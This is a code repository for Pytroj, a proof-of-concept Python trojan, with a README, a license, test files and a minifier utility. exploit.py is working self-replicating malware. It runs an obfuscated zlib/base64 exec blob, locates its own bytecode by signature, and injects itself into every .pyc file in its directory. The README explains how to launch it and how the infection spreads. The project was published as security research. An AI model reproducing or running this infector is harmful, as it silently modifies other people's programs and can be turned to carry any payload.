├── b.py ├── c.py ├── filesize.py ├── LICENSE.md ├── README.md ├── exploit.py ├── minify.py └── byteplay.py /b.py: -------------------------------------------------------------------------------- 1 | print "Original" 2 | -------------------------------------------------------------------------------- /c.py: -------------------------------------------------------------------------------- 1 | print __file__ 2 | import inspect 3 | print inspect.getfile(inspect.currentframe()) 4 | 5 | -------------------------------------------------------------------------------- /filesize.py: -------------------------------------------------------------------------------- 1 | import marshal, byteplay 2 | 3 | f = open('exploit.pyc') 4 | f.read(8) 5 | data = byteplay.Code.from_code(marshal.loads(f.read())) 6 | count = 0 7 | for op, args in data.code: 8 | if op == byteplay.SetLineno: 9 | count = args 10 | 11 | print count, len(data.code) 12 | -------------------------------------------------------------------------------- /LICENSE.md: -------------------------------------------------------------------------------- 1 | #Pytroj 2 | ###PoC for trojan in python -- Copyright (C) 2011 3 | 4 | This library is free software; you can redistribute it and/or 5 | modify it under the terms of the GNU Lesser General Public 6 | License as published by the Free Software Foundation; either 7 | version 2.1 of the License, or (at your option) any later version. 8 | 9 | This library is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 12 | Lesser General Public License for more details. 13 | 14 | You should have received a copy of the GNU Lesser General Public 15 | License along with this library; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA 16 | 17 | ###Authors 18 | Joey Geralnik 19 | 20 | Leon Fedotov 21 | 22 | Itzik Kotler 23 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Pytroj 2 | 3 | __Pytroj is a proof of concept attack against .pyc files.__ It searches for other .pyc files and injects itself into them. The injected code can be any python code (in this case it prints "You have been exploited"). 4 | 5 | This proof of concept only searches for .pyc files in its own directory. To use it: 6 | 7 | python -c 'import exploit, b, c' 8 | python exploit.pyc 9 | 10 | The files b.pyc and c.pyc will now be infected. If you create another .pyc file (for example, python -c 'import byteplay') and run either b.pyc or c.pyc, the new file will also get infected. 11 | 12 | Another way to run an infected file is to import it once the .pyc file exists: 13 | 14 | python -c 'import b' 15 | 16 | The infected files print out a list of files that they have newly infected, followed by the phrase "You have been exploited" 17 | 18 | After that, infected programs will continue to execute as normal. 19 | 20 | [Slides are here](http://www.slideshare.net/DRagonRage519/pytroj-11153381 "slideshare") 21 | 22 | 23 | ### On the web 24 | 25 | * [Symantec - python has venom.] (http://www.symantec.com/connect/blogs/python-has-venom) 26 | * [Hackernews] (http://news.ycombinator.com/item?id=3039439) 27 | * [Jacob's Tips for Virus Removal] (http://jacoblol75.blog.com/2011/10/09/simple-ways-to-get-rid-of-python-pytroj/) 28 | * [Packet strom] (http://packetstormsecurity.org/files/105385/Pytroj-Tool-Python-Injector.html) 29 | 30 | For help, questions, or comments, feel free to contact us: 31 | 32 | 33 | [Joey Geralnik](https://github.com/jgeralnik "jgeralnik"), 34 | [Leon Fedotov](https://twitter.com/#!/LeonFedotov "Leon Fedotov"), 35 | [Itzik Kotler](https://github.com/ikotler "itzikkotler") 36 | -------------------------------------------------------------------------------- /exploit.py: -------------------------------------------------------------------------------- 1 | signature = "DC9723" #signature is placed at beginning and end of file to identify infected code 2 | import glob, zlib, base64 3 | 4 | #File only works as a pyc 5 | if __file__.endswith('.pyc'): 6 | 7 | #The minified version of byteplay 8 | exec zlib.decompress(base64.b64decode('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')) 9 | 10 | #Load this file and identify the exploit part 11 | f = open(__file__, 'r') 12 | 13 | #First 8 bytes are magic number and timestamp 14 | head = f.read(8) 15 | 16 | data = Code.from_code(marshal.loads(f.read())) 17 | f.close() 18 | 19 | last_line = 1 20 | for i in xrange(2, len(data.code)): 21 | if data.code[i][0] == SetLineno: 22 | #Find last line of code to update the real code appropriately 23 | last_line = data.code[i][1] 24 | if type(data.code[i][1]) == type('') and data.code[i][1] == signature: 25 | #Found signature at end of exploit 26 | EXPLOIT_SIZE = i+1 27 | break 28 | 29 | exploit = data.code[:EXPLOIT_SIZE] 30 | 31 | def infect(f_to_infect): 32 | 33 | f = open(f_to_infect, 'r') 34 | 35 | #Magic number and timestamp 36 | head = f.read(8) 37 | 38 | data = Code.from_code(marshal.loads(f.read())) 39 | if data.code[1][1] == signature: 40 | #Code is already infected 41 | return 42 | 43 | print f_to_infect 44 | f.close() 45 | lines = [] 46 | for i, op in enumerate(data.code): 47 | if op[0] == SetLineno: 48 | #Update line numbers to match with new code 49 | data.code[i] = (SetLineno, op[1]+last_line) 50 | 51 | #Insert exploit 52 | data.code[:0] = exploit 53 | 54 | newfile = open(f_to_infect, 'w') 55 | newfile.write(head) 56 | marshal.dump(data.to_code(), newfile) 57 | newfile.close() 58 | for i in glob.glob("./*.pyc"): 59 | infect(i) 60 | 61 | print "You have been exploited" 62 | 63 | signature = "DC9723" 64 | -------------------------------------------------------------------------------- /minify.py: -------------------------------------------------------------------------------- 1 | ## {{{ http://code.activestate.com/recipes/576704/ (r16) 2 | #!/usr/bin/env python 3 | # -*- coding: utf-8 -*- 4 | # 5 | # pyminifier.py 6 | # 7 | # Copyright 2009 Dan McDougall 8 | # 9 | # This program is free software; you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation; Version 3 of the License 12 | # 13 | # This program is distributed in the hope that it will be useful, 14 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 15 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 16 | # GNU General Public License for more details. 17 | # 18 | # You should have received a copy of the GNU General Public License 19 | # along with this program; if not, the license can be downloaded here: 20 | # 21 | # http://www.gnu.org/licenses/gpl.html 22 | 23 | # Meta 24 | __version__ = '1.4.1' 25 | __license__ = "GNU General Public License (GPL) Version 3" 26 | __version_info__ = (1, 4, 1) 27 | __author__ = 'Dan McDougall ' 28 | 29 | """ 30 | **Python Minifier:** Reduces the size of (minifies) Python code for use on 31 | embedded platforms. 32 | 33 | Performs the following: 34 | - Removes docstrings. 35 | - Removes comments. 36 | - Minimizes code indentation. 37 | - Joins multiline pairs of parentheses, braces, and brackets (and removes extraneous whitespace within). 38 | - Preserves shebangs and encoding info (e.g. "# -- coding: utf-8 --"). 39 | 40 | Various examples and edge cases are sprinkled throughout the pyminifier code so 41 | that it can be tested by minifying itself. The way to test is thus: 42 | 43 | .. code-block:: bash 44 | 45 | $ python pyminifier.py pyminifier.py > minified_pyminifier.py 46 | $ python minified_pyminifier.py pyminifier.py > this_should_be_identical.py 47 | $ diff minified_pyminifier.py this_should_be_identical.py 48 | $ 49 | 50 | If you get an error executing minified_pyminifier.py or 51 | 'this_should_be_identical.py' isn't identical to minified_pyminifier.py then 52 | something is broken. 53 | """ 54 | 55 | import sys, re, cStringIO, tokenize 56 | from optparse import OptionParser 57 | 58 | # Compile our regular expressions for speed 59 | multiline_quoted_string = re.compile(r'(\'\'\'|\"\"\")') 60 | not_quoted_string = re.compile(r'(\".*\'\'\'.*\"|\'.*\"\"\".*\')') 61 | trailing_newlines = re.compile(r'\n\n') 62 | shebang = re.compile('^#\!.*$') 63 | encoding = re.compile(".*coding[:=]\s*([-\w.]+)") 64 | multiline_indicator = re.compile('\\\\(\s*#.*)?\n') 65 | # The above also removes trailing comments: "test = 'blah \ # comment here" 66 | 67 | # These aren't used but they're a pretty good reference: 68 | double_quoted_string = re.compile(r'((? last_lineno: 112 | last_col = 0 113 | if start_col > last_col: 114 | out += (" " * (start_col - last_col)) 115 | # Remove comments: 116 | if token_type == tokenize.COMMENT: 117 | pass 118 | # This series of conditionals removes docstrings: 119 | elif token_type == tokenize.STRING: 120 | if prev_toktype != tokenize.INDENT: 121 | # This is likely a docstring; double-check we're not inside an operator: 122 | if prev_toktype != tokenize.NEWLINE: 123 | # Note regarding NEWLINE vs NL: The tokenize module 124 | # differentiates between newlines that start a new statement 125 | # and newlines inside of operators such as parens, brackes, 126 | # and curly braces. Newlines inside of operators are 127 | # NEWLINE and newlines that start new code are NL. 128 | # Catch whole-module docstrings: 129 | if start_col > 0: 130 | # Unlabelled indentation means we're inside an operator 131 | out += token_string 132 | # Note regarding the INDENT token: The tokenize module does 133 | # not label indentation inside of an operator (parens, 134 | # brackets, and curly braces) as actual indentation. 135 | # For example: 136 | # def foo(): 137 | # "The spaces before this docstring are tokenize.INDENT" 138 | # test = [ 139 | # "The spaces before this string do not get a token" 140 | # ] 141 | else: 142 | out += token_string 143 | prev_toktype = token_type 144 | last_col = end_col 145 | last_lineno = end_line 146 | return out 147 | 148 | def reduce_operators(source): 149 | """ 150 | Remove spaces between operators in 'source' and returns the result. 151 | 152 | Example: 153 | 154 | .. code-block:: python 155 | 156 | def foo(foo, bar, blah): 157 | test = "This is a %s" % foo 158 | 159 | Will become: 160 | 161 | .. code-block:: python 162 | 163 | def foo(foo,bar,blah): 164 | test="This is a %s"%foo 165 | """ 166 | io_obj = cStringIO.StringIO(source) 167 | remove_columns = [] 168 | out = "" 169 | out_line = "" 170 | prev_toktype = tokenize.INDENT 171 | prev_tok = None 172 | last_lineno = -1 173 | last_col = 0 174 | lshift = 1 175 | for tok in tokenize.generate_tokens(io_obj.readline): 176 | token_type = tok[0] 177 | token_string = tok[1] 178 | start_line, start_col = tok[2] 179 | end_line, end_col = tok[3] 180 | ltext = tok[4] 181 | if start_line > last_lineno: 182 | last_col = 0 183 | if start_col > last_col: 184 | out_line += (" " * (start_col - last_col)) 185 | if token_type == tokenize.OP: 186 | # Operators that begin a line such as @ or open parens should be 187 | # left alone 188 | start_of_line_types = [ # These indicate we're starting a new line 189 | tokenize.NEWLINE, tokenize.DEDENT, tokenize.INDENT] 190 | if prev_toktype not in start_of_line_types: 191 | # This is just a regular operator; remove spaces 192 | remove_columns.append(start_col) # Before OP 193 | remove_columns.append(end_col+1) # After OP 194 | if token_string.endswith('\n'): 195 | out_line += token_string 196 | if remove_columns: 197 | for col in remove_columns: 198 | col = col - lshift 199 | try: 200 | # This was really handy for debugging (looks nice, worth saving): 201 | #print out_line + (" " * col) + "^" 202 | # The above points to the character we're looking at 203 | if out_line[col] == " ": # Only if it is a space 204 | out_line = out_line[:col] + out_line[col+1:] 205 | lshift += 1 # To re-align future changes on this line 206 | except IndexError: # Reached and end of line, no biggie 207 | pass 208 | out += out_line 209 | remove_columns = [] 210 | out_line = "" 211 | lshift = 1 212 | else: 213 | out_line += token_string 214 | prev_toktype = token_type 215 | prev_token = tok 216 | last_col = end_col 217 | last_lineno = end_line 218 | # This makes sure to capture the last line if it doesn't end in a newline: 219 | out += out_line 220 | # The tokenize module doesn't recognize @ sign before a decorator 221 | return out 222 | 223 | # NOTE: This isn't used anymore... Just here for reference in case someone 224 | # searches the internet looking for a way to remove similarly-styled end-of-line 225 | # comments from non-python code. It also acts as an edge case of sorts with 226 | # that raw triple quoted string inside the "quoted_string" assignment. 227 | def remove_comment(single_line): 228 | """ 229 | Removes the comment at the end of the line (if any) and returns the result. 230 | """ 231 | quoted_string = re.compile( 232 | r'''((? 1 or len(line.split("'''")): 305 | # This is a single line that uses the triple quotes twice 306 | # Treat it as if it were just a regular line: 307 | output += line + '\n' 308 | quoted_string = False 309 | else: 310 | output += line + '\n' 311 | quoted_string = True 312 | elif quoted_string and multiline_quoted_string.search(line): 313 | output += line + '\n' 314 | quoted_string = False 315 | # Now let's focus on the lines containing our opener and/or closer: 316 | elif not quoted_string: 317 | if opener_regex.search(line) or closer_regex.search(line) or inside_pair: 318 | for character in line: 319 | if character == opener: 320 | if not escaped and not inside_quotes: 321 | openers += 1 322 | inside_pair = True 323 | output += character 324 | else: 325 | escaped = False 326 | output += character 327 | elif character == closer: 328 | if not escaped and not inside_quotes: 329 | if openers and openers == (closers + 1): 330 | closers = 0 331 | openers = 0 332 | inside_pair = False 333 | output += character 334 | else: 335 | closers += 1 336 | output += character 337 | else: 338 | escaped = False 339 | output += character 340 | elif character == '\\': 341 | if escaped: 342 | escaped = False 343 | output += character 344 | else: 345 | escaped = True 346 | output += character 347 | elif character == '"' and escaped: 348 | output += character 349 | escaped = False 350 | elif character == "'" and escaped: 351 | output += character 352 | escaped = False 353 | elif character == '"' and inside_quotes: 354 | if inside_single_quotes: 355 | output += character 356 | else: 357 | inside_quotes = False 358 | inside_double_quotes = False 359 | output += character 360 | elif character == "'" and inside_quotes: 361 | if inside_double_quotes: 362 | output += character 363 | else: 364 | inside_quotes = False 365 | inside_single_quotes = False 366 | output += character 367 | elif character == '"' and not inside_quotes: 368 | inside_quotes = True 369 | inside_double_quotes = True 370 | output += character 371 | elif character == "'" and not inside_quotes: 372 | inside_quotes = True 373 | inside_single_quotes = True 374 | output += character 375 | elif character == ' ' and inside_pair and not inside_quotes: 376 | if not output[-1] in [' ', opener]: 377 | output += ' ' 378 | else: 379 | if escaped: 380 | escaped = False 381 | output += character 382 | if inside_pair == False: 383 | output += '\n' 384 | else: 385 | output += line + '\n' 386 | else: 387 | output += line + '\n' 388 | 389 | # Clean up 390 | output = trailing_newlines.sub('\n', output) 391 | 392 | return output 393 | 394 | def dedent(source): 395 | """ 396 | Minimizes indentation to save precious bytes 397 | 398 | Example: 399 | 400 | .. code-block:: python 401 | 402 | def foo(bar): 403 | test = "This is a test" 404 | 405 | Will become: 406 | 407 | .. code-block:: python 408 | 409 | def foo(bar): 410 | test = "This is a test" 411 | """ 412 | io_obj = cStringIO.StringIO(source) 413 | out = "" 414 | last_lineno = -1 415 | last_col = 0 416 | prev_start_line = 0 417 | indentation = "" 418 | indentation_level = 0 419 | for i,tok in enumerate(tokenize.generate_tokens(io_obj.readline)): 420 | token_type = tok[0] 421 | token_string = tok[1] 422 | start_line, start_col = tok[2] 423 | end_line, end_col = tok[3] 424 | if start_line > last_lineno: 425 | last_col = 0 426 | if token_type == tokenize.INDENT: 427 | indentation_level += 1 428 | continue 429 | if token_type == tokenize.DEDENT: 430 | indentation_level -= 1 431 | continue 432 | indentation = " " * indentation_level 433 | if start_line > prev_start_line: 434 | out += indentation + token_string 435 | elif start_col > last_col: 436 | out += " " + token_string 437 | else: 438 | out += token_string 439 | prev_start_line = start_line 440 | last_col = end_col 441 | last_lineno = end_line 442 | return out 443 | 444 | def fix_empty_methods(source): 445 | """ 446 | Appends 'pass' to empty methods/functions (i.e. where there was nothing but 447 | a docstring before we removed it =). 448 | 449 | Example: 450 | 451 | .. code-block:: python 452 | 453 | # Note: This triple-single-quote inside a triple-double-quote is also a 454 | # pyminifier self-test 455 | def myfunc(): 456 | '''This is just a placeholder function.''' 457 | 458 | Will become: 459 | 460 | .. code-block:: python 461 | 462 | def myfunc(): pass 463 | """ 464 | def_indentation_level = 0 465 | output = "" 466 | just_matched = False 467 | previous_line = None 468 | method = re.compile(r'^\s*def\s*.*\(.*\):.*$') 469 | for line in source.split('\n'): 470 | if len(line.strip()) > 0: # Don't look at blank lines 471 | if just_matched == True: 472 | this_indentation_level = len(line.rstrip()) - len(line.strip()) 473 | if def_indentation_level == this_indentation_level: 474 | # This method is empty, insert a 'pass' statement 475 | output += "%s pass\n%s\n" % (previous_line, line) 476 | else: 477 | output += "%s\n%s\n" % (previous_line, line) 478 | just_matched = False 479 | elif method.match(line): 480 | def_indentation_level = len(line) - len(line.strip()) # A commment 481 | just_matched = True 482 | previous_line = line 483 | else: 484 | output += "%s\n" % line # Another self-test 485 | else: 486 | output += "\n" 487 | return output 488 | 489 | def remove_blank_lines(source): 490 | """ 491 | Removes blank lines from 'source' and returns the result. 492 | 493 | Example: 494 | 495 | .. code-block:: python 496 | 497 | test = "foo" 498 | 499 | test2 = "bar" 500 | 501 | Will become: 502 | 503 | .. code-block:: python 504 | 505 | test = "foo" 506 | test2 = "bar" 507 | """ 508 | io_obj = cStringIO.StringIO(source) 509 | source = [a for a in io_obj.readlines() if a.strip()] 510 | return "".join(source) 511 | 512 | def minify(source): 513 | """ 514 | Remove all docstrings, comments, blank lines, and minimize code 515 | indentation from 'source' then prints the result. 516 | """ 517 | preserved_shebang = None 518 | preserved_encoding = None 519 | 520 | # This is for things like shebangs that must be precisely preserved 521 | for line in source.split('\n')[0:2]: 522 | # Save the first comment line if it starts with a shebang 523 | # (e.g. '#!/usr/bin/env python') <--also a self test! 524 | if shebang.match(line): # Must be first line 525 | preserved_shebang = line 526 | continue 527 | # Save the encoding string (must be first or second line in file) 528 | if encoding.match(line): 529 | preserved_encoding = line 530 | 531 | # Remove multilines (e.g. lines that end with '\' followed by a newline) 532 | source = multiline_indicator.sub('', source) 533 | 534 | # Remove docstrings (Note: Must run before fix_empty_methods()) 535 | source = remove_comments_and_docstrings(source) 536 | 537 | # Remove empty (i.e. single line) methods/functions 538 | source = fix_empty_methods(source) 539 | 540 | # Join multiline pairs of parens, brackets, and braces 541 | source = join_multiline_pairs(source) 542 | source = join_multiline_pairs(source, '[]') 543 | source = join_multiline_pairs(source, '{}') 544 | 545 | # Remove whitespace between operators: 546 | source = reduce_operators(source) 547 | 548 | # Minimize indentation 549 | source = dedent(source) 550 | 551 | # Re-add preseved items 552 | if preserved_encoding: 553 | source = preserved_encoding + "\n" + source 554 | if preserved_shebang: 555 | source = preserved_shebang + "\n" + source 556 | 557 | # Remove blank lines 558 | source = remove_blank_lines(source).rstrip('\n') # Stubborn last newline 559 | 560 | return source 561 | 562 | def bz2_pack(source): 563 | "Returns 'source' as a bzip2-compressed, self-extracting python script." 564 | import bz2, base64 565 | out = "" 566 | compressed_source = bz2.compress(source) 567 | out += 'import bz2, base64\n' 568 | out += "exec bz2.decompress(base64.b64decode('" 569 | out += base64.b64encode((compressed_source)) 570 | out += "'))\n" 571 | return out 572 | 573 | def gz_pack(source): 574 | "Returns 'source' as a gzip-compressed, self-extracting python script." 575 | import zlib, base64 576 | out = "" 577 | compressed_source = zlib.compress(source) 578 | out += 'import zlib, base64\n' 579 | out += "exec zlib.decompress(base64.b64decode('" 580 | out += base64.b64encode((compressed_source)) 581 | out += "'))\n" 582 | return out 583 | 584 | # The test.+() functions below are for testing pyminifer... 585 | def test_decorator(f): 586 | """Decorator that does 